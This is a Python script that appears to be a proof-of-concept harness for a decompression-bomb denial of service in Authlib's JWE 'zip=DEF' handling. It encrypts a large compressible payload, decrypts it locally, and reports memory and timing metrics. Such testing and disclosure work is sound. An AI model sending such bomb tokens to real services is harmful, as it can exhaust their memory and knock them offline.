#!/usr/bin/env python3
"""Exercise Authlib JWE zip=DEF decompression behavior for benign vs bomb payloads.

Usage example:
    python3 jwe_deflate_dos_demo.py --size 50 --max-rss-mb 2048
"""
# Summary: Demonstrates Authlib's JWE decompression handling by comparing a tiny plaintext
# with a compressible megabyte-scale payload, reporting runtime, memory, and size metrics.
# Variables:
# PROTECTED_HEADER: dict - Static header enabling direct A256GCM with DEFLATE compression.
# SYMMETRIC_KEY: bytes - Fixed 32-byte local key for reproducible JWE encryption/decryption.
# DEFAULT_NORMAL_PLAINTEXT: bytes - Small sample payload used for the baseline case (~13B).
# CSV_HEADER: tuple[str, ...] - Column labels for optional CSV logging output.
# JWE_INSTANCE: JsonWebEncryption - Shared Authlib JWE helper reused across test cases.
#
# Added to exercise Authlib's JWE zip=DEF path: encrypts/decrypts both a tiny baseline message
# and a compressible bomb payload, captures wall/CPU timing, peak RSS, current RSS deltas,
# ciphertext vs. decompressed sizes, and compression ratio; optional CSV logging and a peak-RSS
# abort threshold are built in so the decompression spike is easy to capture.

import argparse  # Parse CLI arguments for payload sizing, RSS limit, and CSV logging.
import csv  # Emit optional structured metrics for later analysis via spreadsheets.
import os  # Provide access to process identifiers for RSS sampling fallbacks.
import platform  # Surface runtime context in warning banners for clarity.
import sys  # Handle graceful exits and MemoryError propagation paths.
import time  # Measure wall-clock and CPU durations for decrypt operations.
import resource  # Inspect peak RSS via POSIX resource usage metrics.

try:  # Attempt to expose resident set size via psutil when available.
    import psutil  # type: ignore  # Access richer memory telemetry when the library exists.
except ImportError:  # Fallback path when psutil is not installed in the environment.
    psutil = None  # Ensure the rest of the script can gracefully integrate without psutil.

from authlib import __version__ as AUTHLIB_VERSION  # Report the installed Authlib version.
from authlib.jose import JsonWebEncryption  # Perform compact JWE encode/decode operations.

# Protected JWE header: direct symmetric key ("dir"), A256GCM content encryption, DEFLATE ("DEF") compression.
PROTECTED_HEADER = dict(alg="dir", enc="A256GCM", zip="DEF")
# Thirty-two 0x01 bytes: deterministic key material for a local demo only (never for production).
SYMMETRIC_KEY = bytes([0x01]) * 32
# 13-byte baseline message standing in for a typical small payload.
DEFAULT_NORMAL_PLAINTEXT = b"Hello, world!"
# Column order for CSV output; run_case() returns dicts keyed by these same names.
CSV_HEADER = (
    "case",  # label such as "normal" or "malicious"
    "plaintext_bytes",  # input size handed to encryption
    "ciphertext_bytes",  # compact JWE string length, in bytes
    "decompressed_bytes",  # size of the payload recovered by decryption
    "ratio",  # decompressed_bytes / ciphertext_bytes
    "wall_s",  # wall-clock seconds spent in the decrypt path
    "cpu_s",  # CPU seconds spent in the decrypt path
    "peak_rss_mb",  # process peak resident set size, in MB
    "rss_delta_mb",  # resident set size change across the decrypt call, in MB
)
# Single JsonWebEncryption helper shared by every encrypt/decrypt call in this module.
JWE_INSTANCE = JsonWebEncryption()


def parse_args() -> argparse.Namespace:  # Build and execute the command-line parser.
    parser = argparse.ArgumentParser(  # Instantiate the parser with a detailed description.
        description=(
            "LOCAL TEST ONLY – demonstrates Authlib JWE zip=DEF decompression expansion; "
            "do not transmit artifacts externally."
        )
    )
    parser.add_argument(  # Register the --size/-size option for controlling malicious payload scale.
        "--size",
        "-size",
        type=float,
        default=50.0,
        help="Malicious plaintext size in megabytes (default: 50).",
    )
    parser.add_argument(  # Register the --max-rss-mb guardrail to bound memory consumption.
        "--max-rss-mb",
        type=float,
        default=1024.0,
        help="Abort when process peak RSS exceeds this many megabytes (default: 1024).",
    )
    parser.add_argument(  # Allow optional CSV logging for result archiving.
        "--csv",
        type=str,
        default=None,
        help="Optional path to append CSV metrics for each case.",
    )
    return parser.parse_args()  # Return the parsed namespace to the caller.


def get_current_rss_mb() -> float:
    """Return this process's current resident set size in megabytes.

    Uses psutil when it was importable; otherwise reads ``/proc/self/statm`` (Linux).
    Returns 0.0 when neither source is usable, so callers see a zero delta instead of a
    crash (peak RSS is still reported separately).
    """
    if psutil is not None:  # Preferred: psutil works across platforms.
        return psutil.Process(os.getpid()).memory_info().rss / (1024 * 1024)
    try:
        with open("/proc/self/statm", "r", encoding="ascii") as statm_file:
            fields = statm_file.read().split()  # split() with no argument also drops the trailing newline.
        resident_pages = int(fields[1]) if len(fields) > 1 else 0  # Second statm field: resident pages.
        page_size = os.sysconf("SC_PAGE_SIZE") if hasattr(os, "sysconf") else 4096
        return (resident_pages * page_size) / (1024 * 1024)
    # OSError covers FileNotFoundError and PermissionError, plus other open() failures and
    # os.sysconf errors that previously escaped this best-effort fallback.
    except (OSError, IndexError, ValueError):
        return 0.0


def format_bytes(num_bytes: int) -> str:
    """Render *num_bytes* compactly: whole MB at or above 1 MiB, whole KB at or above 1 KiB, else bytes.

    Values are rounded to the nearest whole unit (``.0f``), e.g. ``2048 -> "2KB"``.
    """
    for unit_size, suffix in ((1024 * 1024, "MB"), (1024, "KB")):
        if num_bytes >= unit_size:
            return f"{num_bytes / unit_size:.0f}{suffix}"
    return f"{num_bytes}B"


def compute_ratio(numerator: int, denominator: int) -> float:
    """Return ``numerator / denominator``, or positive infinity when the denominator is zero.

    Used for the compression ratio (decompressed bytes per ciphertext byte), where a zero
    denominator would otherwise raise ZeroDivisionError.
    """
    return float("inf") if denominator == 0 else numerator / denominator


def serialize_ciphertext(plaintext: bytes) -> str:
    """Encrypt *plaintext* into a compact JWE using the module's fixed header and key.

    Always returns ``str``; a ``bytes`` token from Authlib is ASCII-decoded first.
    """
    compact = JWE_INSTANCE.serialize_compact(PROTECTED_HEADER, plaintext, SYMMETRIC_KEY)
    if isinstance(compact, bytes):
        compact = compact.decode("ascii")
    return compact


def deserialize_plaintext(ciphertext: str) -> bytes:
    """Decrypt a compact JWE string with the module key and return its ``"payload"`` bytes."""
    return JWE_INSTANCE.deserialize_compact(ciphertext, SYMMETRIC_KEY)["payload"]


def _peak_rss_mb() -> float:  # Process lifetime peak RSS in MB, with platform-specific units normalized.
    """Return this process's peak resident set size in megabytes.

    ``ru_maxrss`` is reported in kilobytes on Linux but in bytes on macOS. Dividing by 1024
    unconditionally overstated macOS peaks roughly 1024x and tripped the RSS limit at once.
    """
    raw_peak = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
    units_per_mb = 1024 * 1024 if sys.platform == "darwin" else 1024
    return raw_peak / units_per_mb


def run_case(case_name: str, plaintext: bytes, rss_limit_mb: float) -> dict[str, float | int | str]:
    """Encrypt *plaintext*, then time and measure the decrypt/decompress path.

    Args:
        case_name: Label stored under ``"case"`` (e.g. ``"normal"`` or ``"malicious"``).
        plaintext: Payload to encrypt with the module's zip=DEF header and decrypt again.
        rss_limit_mb: Peak-RSS threshold in megabytes.

    Returns:
        Metrics keyed by case, plaintext_bytes, ciphertext_bytes, decompressed_bytes, ratio,
        wall_s, cpu_s, peak_rss_mb and rss_delta_mb.

    Exits:
        Calls ``sys.exit(1)`` if the process peak RSS exceeds *rss_limit_mb*. The check runs
        after decryption returns, so it reports an overshoot; it cannot prevent one.
    """
    # Encrypt outside the timed window; with zip=DEF the payload is compressed here.
    ciphertext = serialize_ciphertext(plaintext)
    # Take the RSS baseline only now, so rss_delta_mb covers the decrypt call alone instead of
    # also counting memory allocated while compressing/encrypting the plaintext.
    baseline_rss = get_current_rss_mb()
    start_wall = time.perf_counter()
    start_cpu = time.process_time()
    decrypted = deserialize_plaintext(ciphertext)  # Decryption plus decompression.
    wall_delta = time.perf_counter() - start_wall
    cpu_delta = time.process_time() - start_cpu
    # ru_maxrss is a lifetime high-water mark: it also reflects earlier allocations such as
    # building and encrypting the payload, not only this decrypt.
    peak_rss_mb = _peak_rss_mb()
    current_rss_mb = get_current_rss_mb()
    rss_delta_mb = max(0.0, current_rss_mb - baseline_rss)  # Clamp: RSS can fall if memory is released.
    plaintext_bytes = len(plaintext)
    ciphertext_bytes = len(ciphertext.encode("utf-8"))  # Compact JWE is ASCII, so this is its length in bytes.
    decompressed_bytes = len(decrypted)
    ratio = compute_ratio(decompressed_bytes, ciphertext_bytes)
    if peak_rss_mb > rss_limit_mb:
        print(
            f"[ABORT] peak RSS {peak_rss_mb:.1f}MB exceeded limit {rss_limit_mb:.1f}MB during {case_name} case",
            file=sys.stderr,
        )
        sys.exit(1)
    return {
        "case": case_name,
        "plaintext_bytes": plaintext_bytes,
        "ciphertext_bytes": ciphertext_bytes,
        "decompressed_bytes": decompressed_bytes,
        "ratio": ratio,
        "wall_s": wall_delta,
        "cpu_s": cpu_delta,
        "peak_rss_mb": peak_rss_mb,
        "rss_delta_mb": rss_delta_mb,
    }


def emit_case_report(case_metrics: dict[str, float | int | str]) -> None:
    """Print one space-separated ``[CASE]`` summary line for a single case's metrics."""
    m = case_metrics
    size_fields = " ".join(
        f"{label}={format_bytes(int(m[key]))}"
        for label, key in (
            ("plaintext", "plaintext_bytes"),
            ("ciphertext", "ciphertext_bytes"),
            ("decompressed", "decompressed_bytes"),
        )
    )
    timing_fields = f"wall_s={m['wall_s']:.3f} cpu_s={m['cpu_s']:.3f}"
    memory_fields = f"peak_rss_mb={m['peak_rss_mb']:.1f} rss_delta_mb={m['rss_delta_mb']:.1f}"
    print(f"[CASE] {m['case']} {size_fields} {timing_fields} {memory_fields} ratio={m['ratio']:.1f}")


def maybe_write_csv(csv_path: str | None, metrics: list[dict[str, float | int | str]]) -> None:
    """Append *metrics* as CSV rows to *csv_path*, writing the header first if the file is empty.

    Does nothing when *csv_path* is ``None`` or empty. Columns follow CSV_HEADER; a row key
    not in CSV_HEADER makes csv.DictWriter raise ValueError, and missing keys are written empty.
    """
    if not csv_path:
        return
    with open(csv_path, "a", newline="", encoding="utf-8") as csv_file:
        writer = csv.DictWriter(csv_file, fieldnames=CSV_HEADER)
        # Append mode starts at end-of-file, so position 0 means "new or empty file". An
        # existence check skipped the header for zero-byte files and raced with other writers.
        if csv_file.tell() == 0:
            writer.writeheader()
        writer.writerows(metrics)


def main() -> None:
    """Run the baseline and bomb cases, report each one, and optionally append CSV metrics.

    Exit codes: 2 if a MemoryError occurs while building or decrypting a payload; run_case
    exits with 1 when the peak-RSS limit is exceeded.
    """
    args = parse_args()
    print("LOCAL TEST ONLY – do not send to third-party systems.")
    print(  # Runtime metadata for reproducibility.
        f"Runtime: Python {platform.python_version()} / Authlib {AUTHLIB_VERSION} / zip=DEF via A256GCM"
    )
    malicious_plaintext_size = int(args.size * 1024 * 1024)  # Megabytes -> byte count.
    try:
        normal_case = run_case("normal", DEFAULT_NORMAL_PLAINTEXT, args.max_rss_mb)
        # Report (and flush) the baseline before the heavy case, so it is not lost if that
        # case aborts via sys.exit or the process is killed mid-decompression.
        emit_case_report(normal_case)
        sys.stdout.flush()
        # Build bytes directly. The old str-then-encode route briefly held two full-size
        # copies, which inflated the lifetime peak RSS reported for the malicious case.
        malicious_payload = b"A" * malicious_plaintext_size
        malicious_case = run_case("malicious", malicious_payload, args.max_rss_mb)
    except MemoryError:
        print(
            "Caught MemoryError while preparing or decrypting payload – lower --size or raise limits.",
            file=sys.stderr,
        )
        sys.exit(2)
    emit_case_report(malicious_case)
    maybe_write_csv(args.csv, [normal_case, malicious_case])


if __name__ == "__main__":  # Execute the main entry point when run as a script.
    main()
